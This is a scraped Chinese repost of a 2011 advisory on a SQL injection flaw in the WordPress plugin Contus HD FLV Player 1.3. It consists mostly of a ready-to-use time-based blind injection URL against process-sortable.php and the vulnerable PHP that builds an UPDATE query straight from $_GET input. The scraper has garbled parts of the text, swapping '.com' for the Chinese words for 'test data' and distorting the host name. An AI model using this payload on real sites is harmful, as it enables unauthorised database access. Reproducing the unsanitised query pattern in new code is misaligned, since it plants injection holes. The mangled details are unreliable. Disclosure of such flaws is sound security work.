好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

WordPress插件Contus HD FLV Player <= 1.3 SQL注射缺陷及

标题: WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability 时间: 2011-08-17 作者: Miroslav Stampar (miroslav.stampar(at)gmail测试数据 @stamparm) 下载地址: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip 测试版本: 1.3 (tested)   --- 测试方法 --- http://HdhCmsTest2cto测试数据 /wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000, MD5 (CHAR(115,113,108,109,97,112))),0)&listItem[]=1   --------------- Vulnerable code --------------- $pid1 = $_GET['playid'];   foreach ($_GET['listItem'] as $position => $item) :     mysql _query("UPDATE $wpdb->prefix" . "hdflv_med2play SET `sorder` = $position WHERE `media_id` = $item and playlist_id=$pid1 "); endforeach; 修复: 过滤

查看更多关于WordPress插件Contus HD FLV Player <= 1.3 SQL注射缺陷及的详细内容...

  阅读:43次